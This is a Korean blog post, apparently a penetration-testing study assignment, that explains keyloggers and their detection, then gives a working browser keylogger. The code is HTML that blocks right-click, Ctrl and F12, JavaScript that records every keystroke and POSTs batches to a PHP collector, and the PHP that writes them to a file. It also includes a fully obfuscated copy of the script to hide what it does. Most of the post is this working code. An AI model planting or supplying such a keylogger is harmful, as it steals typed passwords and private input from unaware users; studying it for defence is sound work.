[과제] 04주차 (1-1 α) (XSS)키 로거 구현

모의 해킹 스터디 - 4주차 과제 (1-1) 키 로거 구현

 

 

키 로깅이란?

키 로깅(Keylogging, 키 스트로크 로깅(Keystroke logging)

 

사용자가 키보드로 PC에 입력하는 내용을 몰래 가로채어 기록하는 행위

• (키보드로 입력하는 정보를 중간에 가로채기 하여 정보를 훔쳐가는 해킹 도구)
• 내가 입력한 키 값의 로그를 타인이 봄으로써 해킹 피해에 노출
• 하드웨어, 소프트웨어를 활용한 방법에서부터 전자적, 음향기술을 활용한 기법까지 다양한 키로깅 방법이 존재

 

키 로거(Key Logger)

Key + Log

• 키보드에 입력한 키의 흔적을 남기는 프로그램
  
  • 프로세스로 사중하면서 키보드에 입력된 모든 기록들을 .txt 혹은 지정된 확장자로 저장되게 함
• 키보드를 통해 이뤄지는 모든 정보가 노출되고 있는 것
  • 키보드 움직임을 탐지하기 때문에 ***로 감추어 나오는 암호의 실제 입력키까지 알 수 있게하기 때문

키 로그 감염 경로

1. 웹 사이트의 첨부파일이나 그 밖에 파일 다운로드 후 실행시 키로그 프로그램이 설치될 수 있음
    (흔히 실행파일에 키로그가 숨겨져 있을 수 있기 때문)
2. 키로그가 숨겨져 있는 프로그램을 실행한 경우
    - 압축파일 해제시(압축파일을 해제하는 경우 자동으로 실행이 가능)
    - 인증되지 않은 사이트에서 Active X 실행시에도 감염이 가능

키 로그 감염 확인 및 제거

전문가들은 마우스 클릭이나 키보드 입력 시 지연이 발생하거나 타이핑한 내용이 스크린에 나타나지 않는 경우
키로깅을 의심해 볼 수 있다고 조언

1. 백신 프로그램을 통한 탐지 (신종 키로그들은 못 잡을 수 있음)
2. 특정 문자열 타이핑 후 입력한 문자열을 파일 내용에서 검색
3. taskmgr에서 해당 키로그 프로세스 찾기
    - (해당 키로그의 프로세스를 찾는 것은 힘이 듬)
    - 의심 가는 프로세스를 찾아봐야 하지만 프로세스들의 이름은 생소한 경우가 많기 때문
4. regedit 에서 실행 프로그램 삭제
HKEY_LOCAL_MACHINE -> SOFTWARE -> Microsoft -> Windows -> CurrentVersion -> Run -> 해당 키로그 삭제(컴퓨터를 부팅했을 때 가장 먼저 실행되는 것들의 정보를 담은 레지스트리를 삭제하는 방식)

 

키로그 프로그램의 실행    

• 보통 부팅시 키 로그 프로그램을 자동 실행 시키는 것이 일반적
• 다른 방법으로 특정 애플리케이션을 실행했을 경우 실행 가능
  • (이런 경우 위의 (4번) 방법으로는 해당 레지스트리를 찾는 것이 불가능)
  • 부팅했을 때 가장 먼저 실행되는 것들의 정보를 찾는 것이기 때문

 

키로깅 프로그램의 작동 방식을 우회하는 방법

• 키로그는 단지 입력하는 것에 대하여 순서대로 전달
  • 로그인 화면에서 ID와 PW를 입력해야 하는 경우
  • (1) ID의 일부 입력 -> (2) 비밀번호의 일부 입력 -> (3) ID의 나머지 입력 -> (4) 비밀번호의 나머지 입력
  • 위와 같은 순서에 따라 정보를 한번에 입력하지 않고, 나눠서 입력하는 방법, 이렇게 하면 정보를 가로채기 하더라고 실제 ID와 비밀번호를 찾기가 어렵게 됨
• 하지만 단순 키보드의 내용 저장만 하는 것이 아님 
  • 피싱 사이트의 경우
    • 입력하는 정보들이 그대로 넘어가게 됨
    • 로그인은 실제로 되는 경우가 있어 눈치 채기 힘듬
  • 화면을 캡처하거나 작업 기록들을 저장하는 경우
    • 어느 부분을 입력하는지를 알아볼 수 있기 때문에 위험도가 높아짐
• 키로깅 과정에 혼란을 주는 안티-키로거 소프트웨어를 구매하는 것도 방법
  • (이것으로도 이미 설치된 키로거를 적발,제거 하는 것은 불가능)

---

키 로거 구현

• 단순 키로거 구현
  
  • 피싱 사이트 X
  • 로그인 창 X
  • (테스트 용)

---

코드 구성

• keylog.html
• keylog.js
• keylog.php

---

keylog.html

<!DOCTYPE html>
<html>
  <head>
    <title>Keylog</title>
    <meta charset="utf-8">
    <script src="keylog.js"></script>
    <script>
        // DISABLE RIGHT CLICK
        document.addEventListener("contextmenu", function(e){
            e.preventDefault();
        }, false);

        // DISABLE SHORTCUT KEYS (Ctrl+U / F12)
        document.addEventListener("keydown", function(e){
            if(e.ctrlKey || e.keyCode==123) {
                e.stopPropagation();
                e.preventDefault();
            }
        });
    </script> 
  </head>
  <body>
    <h1>All key presses will be recorded!</h1>
    <h2>입력하는 모든 키는 기록됩니다.</h2>
        rows : 5, cols : 70<br>
    <textarea rows="5" cols="70"></textarea>
  </body>
</html>

 

• Keylog.html에 접속하면 위의 화면이 나오게 됨
• <script src="keylog.js"></script>
  • keylog.js를 적용

 

<script>
    // DISABLE RIGHT CLICK
    document.addEventListener("contextmenu", function(e){
        e.preventDefault();
    }, false);

    // DISABLE SHORTCUT KEYS (Ctrl+U / F12)
    document.addEventListener("keydown", function(e){
        if(e.ctrlKey || e.keyCode==123) {
            e.stopPropagation();
            e.preventDefault();
        }
    });
</script>

 

• 코드 내부 확인 방지용 코드
  • 우클릭 방지(DISABLE RIGHT CLICK)
    • 마우스 우클릭 시 나오는 아래의 창이 우클릭을 해도 나오지 않음
  • 단축키 방지(DISABLE SHORTCUT KEYS)
    • 마우스 우클릭시 나오는 아래의 창 ( ↓ ↓ ↓) 이 Ctrl + U를 하면 나오기 때문
    • F12로도 코드를 볼 수 있기 때문에 막아둠(그 대신, 키로거에도 입력되지 않음) 
      • 입력 자체를 거부

• textarea 내부에 글 작성 가능
• (이외의 키도 기록됨)
  • ex) Func. key
  • (새로고침 F5, 단축키 방지 F12 를 제외한 Func. key는 잘 출력됨 ↑ ↑ ↑ )

---

keylog.js

var keylog = {
    // (A) SETTINGS & PROPERTIES
    cache : [],      // temp storage for key presses
    delay : 2000,    // how often to send data to server
    sending : false, // flag to allow 1 upload at a time
  
    // (B) INITIALIZE
    init : () => {
        // (B1) CAPTURE 'KEY STROKES'
        window.addEventListener("keydown", evt => keylog.cache.push(evt.key)); // keydown
        // window.addEventListener("keypress", evt => keylog.cache.push(evt.key)); //keypress
    
        // (B2) SEND 'KEY STROKES' TO SERVER
        window.setInterval(keylog.send, keylog.delay);
    },
  
    // (C) AJAX SEND 'KEY STROKES'
    send : () => { if (!keylog.sending && keylog.cache.length != 0) {
      // (C1) "LOCK" UNTIL THIS BATCH IS SENT TO SERVER
      keylog.sending = true;
  
      // (C2) KEYPRESS(keydown) DATA
      var data = new FormData();
      data.append("keys", JSON.stringify(keylog.cache));
      keylog.cache = []; // clear keys
  
      // (C3) FECTH SEND
      fetch("keylog.php", { method:"POST", body:data })
      .then(res=>res.text()).then(res => {
        keylog.sending = false; // unlock
        console.log(res); // optional
      })
      .catch(err => console.error(err));
    }}
  };
  window.addEventListener("DOMContentLoaded", keylog.init);

 

• 입력된 키를 임시 저장
• window.addEventListener("keydown", evt => keylog.cache.push(evt.key));
  • 받아온 키를 keylog의 캐시(cache)에 저장
  • keydown 사용
  • keypress를 이용하지 않는 이유 : KEY DOWN/UP/PRESS

• 'KEY STROKES' 를 서버로 전송
  • window.setInterval(keylog.send, keylog.delay);
• AJAX(Asynchronous JavaScript And XML)를 통한 비동기 HTTP 통신
  • 키가 빠지는 것 없이 입력되기 위해?!
    • 실행 흐름 조절 가능
    • keylog.sending = true / false
  • FETCH
    • 간단한 통신,  업데이트가 잦은 경우
    • 내장 라이브러리인 fetch가 axios보다 안정적일 수 있음
      • (axios는 브라우저 호환성이 뛰어나고, 다양한 기능이 많지만 따로 모듈 설치가 필요)
      • 그 대신 fetch의 경우 JSON으로 변환해주는 과정이 필요
  • 캐시에 임시 저장된 데이터를 data에 저장하고 cache를 비움

 

fetch("keylog.php", { method:"POST", body:data })
      .then(res=>res.text()).then(res => {
        keylog.sending = false; // unlock
        console.log(res); // optional
      })

• FECTH SEND

---

 

js Obfuscator tool / option

OBFUSCATED CODE(keylog.js)

var _0x5cb129=_0x5ceb;function _0x2335(){var _0x549aa1=['error','send','4114548YnVvav','9873556zUQudj','2320886Rsuwul','setInterval','5289378salCPm','3943530FdUXLs','init','then','text','1495536dUfCWC','cache','length','push','addEventListener','sending','key','218340rgXCOv','POST','keys','append'];_0x2335=function(){return _0x549aa1;};return _0x2335();}(function(_0x4f87a1,_0x353324){var _0x3dc969=_0x5ceb,_0x14e052=_0x4f87a1();while(!![]){try{var _0x5374b6=-parseInt(_0x3dc969(0x131))/0x1+parseInt(_0x3dc969(0x123))/0x2+-parseInt(_0x3dc969(0x121))/0x3+-parseInt(_0x3dc969(0x12a))/0x4+-parseInt(_0x3dc969(0x126))/0x5+parseInt(_0x3dc969(0x125))/0x6+parseInt(_0x3dc969(0x122))/0x7;if(_0x5374b6===_0x353324)break;else _0x14e052['push'](_0x14e052['shift']());}catch(_0xffdf38){_0x14e052['push'](_0x14e052['shift']());}}}(_0x2335,0xaaea4));var keylog={'cache':[],'delay':0x7d0,'sending':![],'init':()=>{var _0x52c841=_0x5ceb;window['addEventListener']('keydown',_0x4fb04e=>keylog[_0x52c841(0x12b)][_0x52c841(0x12d)](_0x4fb04e[_0x52c841(0x130)])),window[_0x52c841(0x124)](keylog[_0x52c841(0x120)],keylog['delay']);},'send':()=>{var _0x317b78=_0x5ceb;if(!keylog['sending']&&keylog['cache'][_0x317b78(0x12c)]!=0x0){keylog[_0x317b78(0x12f)]=!![];var _0x1a3b82=new FormData();_0x1a3b82[_0x317b78(0x11e)](_0x317b78(0x11d),JSON['stringify'](keylog['cache'])),keylog[_0x317b78(0x12b)]=[],fetch('keylog.php',{'method':_0x317b78(0x11c),'body':_0x1a3b82})[_0x317b78(0x128)](_0x35ea79=>_0x35ea79[_0x317b78(0x129)]())['then'](_0x138cec=>{var _0x1e0967=_0x317b78;keylog[_0x1e0967(0x12f)]=![],console['log'](_0x138cec);})['catch'](_0x166b0f=>console[_0x317b78(0x11f)](_0x166b0f));}}};function _0x5ceb(_0x5c895f,_0x3be883){var _0x233588=_0x2335();return _0x5ceb=function(_0x5ceb2e,_0x3ac333){_0x5ceb2e=_0x5ceb2e-0x11c;var _0x29a23f=_0x233588[_0x5ceb2e];return _0x29a23f;},_0x5ceb(_0x5c895f,_0x3be883);}window[_0x5cb129(0x12e)]('DOMContentLoaded',keylog[_0x5cb129(0x127)]);

• 위의 keylog.js 를 JavaScript Obfuscator Tool (https://obfuscator.io/)을 이용하여 변환한 것
• 내용을 못 알아보게 하기 위함
• 동일하게 작동 확인

---

keylog.php

<?php
    // (A) OPEN 'KEYLOG FILE', APPEND MODE('a+' : 읽기[read]/추가[append]/쓰기[write])
    $file = fopen("keylog.txt", "a+");

    // (B) SAVE 'KEY STROKES'
    $keys = json_decode($_POST["keys"]);
    foreach ($keys as $k=>$v) { fwrite($file, $v . PHP_EOL); }

    // (C) CLOSE & END FILE
    fclose($file);
    echo "OK";
?>

• fopen 의 Append Mode 설정
  • 파일을 읽기, 추가, 쓰기를 위해 오픈
  • 지정한 파일이 있으면 파일의 끝에서부터 내용을 추가
  • 나머지기능은 (r+)와 같음
    • 지정한 파일이 있는 경우 : 기존의 내용을 덮어 씀
    • 지정한 파일이 없는 경우 : 새로운 파일을 생성해서 데이터를 씀 (저장)

 

---

 

문제점

한글 입력시 Process 라고만 찍혀 나오고 제대로 입력되지 않음

---

후기

로그인 창이나, 피싱사이트를 만들어서 받아오는 것이 아닌, 단순 키로그를 구현

• 단순히 입력되는 모든 키를 받아온 것
• (화면 캡쳐 X, 연결 X)

또한 한글 입력의 아쉬움

• 이 부분에 있어서는 한글의 문자적 특성이 문제가 됨
• 나중에 따로 정리 해볼 필요가 있음 !!

Keydown과 Keypress에 대한 이해가 좀 더 필요.

안정적이고 완벽한 코드를 짜는 것도 중요하지만 
때로는 시간과 타협해서 돌아가는 코드를 짜는 것만으로 만족해야 할 때가 있다.

 

 

질문 환영, 수정 및 보완에 대한 지적 환영